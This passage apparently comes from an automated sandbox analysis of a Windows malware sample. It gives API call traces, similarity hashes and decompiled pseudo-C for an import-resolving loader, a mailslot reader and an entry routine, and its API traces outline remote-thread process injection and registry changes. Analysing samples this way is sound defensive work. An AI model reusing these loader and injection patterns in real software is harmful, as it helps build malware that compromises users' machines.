  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
